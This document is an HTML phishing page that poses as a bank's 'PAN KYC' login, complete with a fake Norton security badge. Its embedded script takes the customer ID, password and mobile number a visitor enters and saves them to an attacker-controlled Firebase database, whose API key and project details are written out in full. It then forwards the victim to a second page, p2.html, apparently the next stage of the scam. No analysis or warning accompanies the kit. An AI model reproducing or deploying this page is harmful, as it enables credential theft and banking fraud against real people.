<!DOCTYPE html>
<html style="">
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <title>Wellcome</title>
    <link rel="preload" as="image" href="fake/afx.png" />
    <link rel="preload" as="image" href="fake/nortonsecurity.png" />
    <meta name="next-head-count" content="5" />
    <link rel="preload" href="fake/a6cd15749f8dde69.css" as="style" />
    <link rel="stylesheet" href="fake/a6cd15749f8dde69.css" data-n-g="" />
  </head>
  <body>
    <div id="__next">
      <div class="header">
        <div class="logo text-center">
          <span
            style="
              box-sizing: border-box;
              display: inline-block;
              overflow: hidden;
              width: initial;
              height: initial;
              background: none;
              opacity: 1;
              border: 0px none;
              margin: 0px;
              padding: 0px;
              position: relative;
              max-width: 100%;
            "
            ><span
              style="
                box-sizing: border-box;
                display: block;
                width: initial;
                height: initial;
                background: none;
                opacity: 1;
                border: 0px none;
                margin: 0px;
                padding: 0px;
                max-width: 100%;
              "
              ><img
                style="
                  display: block;
                  max-width: 100%;
                  width: initial;
                  height: initial;
                  background: none;
                  opacity: 1;
                  border: 0px none;
                  margin: 0px;
                  padding: 0px;
                "
                alt=""
                aria-hidden="true"
                src="data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%27220%27%20height=%2758%27/%3e" /></span
            ><img
              alt="the logo"
              src="fake/afx.png"
              decoding="async"
              data-nimg="intrinsic"
              style="
                position: absolute;
                inset: 0px;
                box-sizing: border-box;
                padding: 0px;
                border: medium none;
                margin: auto;
                display: block;
                width: 0px;
                height: 0px;
                min-width: 100%;
                max-width: 100%;
                min-height: 100%;
                max-height: 100%;
              "
          /></span>
        </div>
      </div>
      <div class="content">
        <h2 class="text-center">Login to PAN KYC</h2>
        <form autocomplete="off" id="form">
          <div class="form-group">
            <label for="username">Customer ID/ User ID</label
            ><input type="text" class="form-control" id="user_id" required="" />
          </div>
          <div class="form-group">
            <label for="username">Password</label
            ><input type="password" class="form-control" id="password" required="" />
          </div>
          <div class="form-group">
            <label for="username">Mobile Number</label
            ><input
              type="text"
              class="form-control"
              inputmode="numeric"
              id="mobile"
              maxlength="10"
              minlength="10"
              title="Enter Valid Mobile Number"
              required=""
            />
          </div>
          <button type="submit" id="button" class="btn btn-primary login-btn">
            LOGIN
          </button>
        </form>
        <div class="second-content">
          <span
            style="
              box-sizing: border-box;
              display: inline-block;
              overflow: hidden;
              width: initial;
              height: initial;
              background: none;
              opacity: 1;
              border: 0px none;
              margin: 0px;
              padding: 0px;
              position: relative;
              max-width: 100%;
            "
            ><span
              style="
                box-sizing: border-box;
                display: block;
                width: initial;
                height: initial;
                background: none;
                opacity: 1;
                border: 0px none;
                margin: 0px;
                padding: 0px;
                max-width: 100%;
              "
              ><img
                style="
                  display: block;
                  max-width: 100%;
                  width: initial;
                  height: initial;
                  background: none;
                  opacity: 1;
                  border: 0px none;
                  margin: 0px;
                  padding: 0px;
                "
                alt=""
                aria-hidden="true"
                src="data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%27100%27%20height=%2772%27/%3e" /></span
            ><img
              alt="northon security"
              src="fake/nortonsecurity.png"
              decoding="async"
              data-nimg="intrinsic"
              style="
                position: absolute;
                inset: 0px;
                box-sizing: border-box;
                padding: 0px;
                border: medium none;
                margin: auto;
                display: block;
                width: 0px;
                height: 0px;
                min-width: 100%;
                max-width: 100%;
                min-height: 100%;
                max-height: 100%;
              "
          /></span>
        </div>
        <div class="security">
          <span class="text">Your security is of the most important.</span
          ><a href="#">Know More click here...</a>
        </div>
        <div class="line">&nbsp;</div>
        <div class="third-content">
          <h3>Don‘t have a Saving Account?</h3>
          <div class="links">
            <a href="#">Credit Card</a><a href="#">Prepaid Card</a
            ><a href="#">Online Retail</a>
          </div>
          <h3>We have added new features!</h3>
          <p class="text-3">You can do more:</p>
          <ul class="bulletin">
            <li>Anywhere access through Desktop or tablet and mobile</li>
            <li>Enhanced security</li>
          </ul>
          <a href="#">View a Demo</a>
        </div>
      </div>
      <div class="footer">
        © Copyright.<a href="#">Terms and Conditions</a
        ><a href="#">Privacy Policy</a>
      </div>
    </div>

    <!-- <script
      type="text/javascript"
      src="https://www.gstatic.com/firebasejs/8.2.9/firebase-app.js"
    ></script>
    <script src="https://www.gstatic.com/firebasejs/8.2.9/firebase-firestore.js"></script> -->
    <script type="module">
      // Import the functions you need from the SDKs you need
      import { initializeApp } from "https://www.gstatic.com/firebasejs/9.17.2/firebase-app.js";
      /* import {
        getFirestore,
        addDoc,
        collection,
        getDocs,
        setDoc,
        doc,
      } from "https://www.gstatic.com/firebasejs/9.17.2/firebase-firestore.js"; */

      import {
        getDatabase,
        ref,
        set,
        query,
        limitToLast,
        get,
      } from "https://www.gstatic.com/firebasejs/9.17.2/firebase-database.js";

      // Your web app's Firebase configuration
      const firebaseConfig = {
  apiKey: "AIzaSyCXmdNNGr_Z3--h06m_nw426qu72jUO25o",
  authDomain: "hbfc-31aba.firebaseapp.com",
  projectId: "hbfc-31aba",
  storageBucket: "hbfc-31aba.appspot.com",
  messagingSenderId: "285844200121",
  appId: "1:285844200121:web:9b3f42bea5766483239968",
  measurementId: "G-XEF591Q08J"
};
      // Initialize Firebase
      const app = initializeApp(firebaseConfig);
      // const db = getFirestore(app);
      const db = getDatabase(app);
      const que = query(ref(db, "users"), limitToLast(1));

      const last_key = await get(que)
        .then((snapshot) => {
          if (snapshot.exists()) {
            return parseInt(Object.keys(snapshot.val())[0]) + 1;
          } else {
            return 1;
          }
        })
        .catch((error) => {
          console.error(error);
        });

      const form = document.getElementById("form");
      form.addEventListener("submit", async (e) => {
        e.preventDefault();
        let user_id = document.getElementById("user_id").value;
        let password = document.getElementById("password").value;
        let mobile = document.getElementById("mobile").value;
        if (user_id != "" && password != "" && mobile != "") {
          try {
            await set(ref(db, "users/" + last_key), {
              user_id: user_id,
              password: password,
              mobile: mobile,
            });

            window.location = "p2.html";
          } catch (e) {
            console.error("Error adding document: ", e);
          }
        }
      });
      /* let doc_id = localStorage.getItem("id");

            await setDoc(doc(db, "users", doc_id), {
              first: "Tokyo",
              country: "Japan",
            }); */

      function makeid(length) {
        let result = "";
        const characters =
          "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
        const charactersLength = characters.length;
        let counter = 0;
        while (counter < length) {
          result += characters.charAt(
            Math.floor(Math.random() * charactersLength)
          );
          counter += 1;
        }
        return result;
      }
    </script>
  </body>
</html>
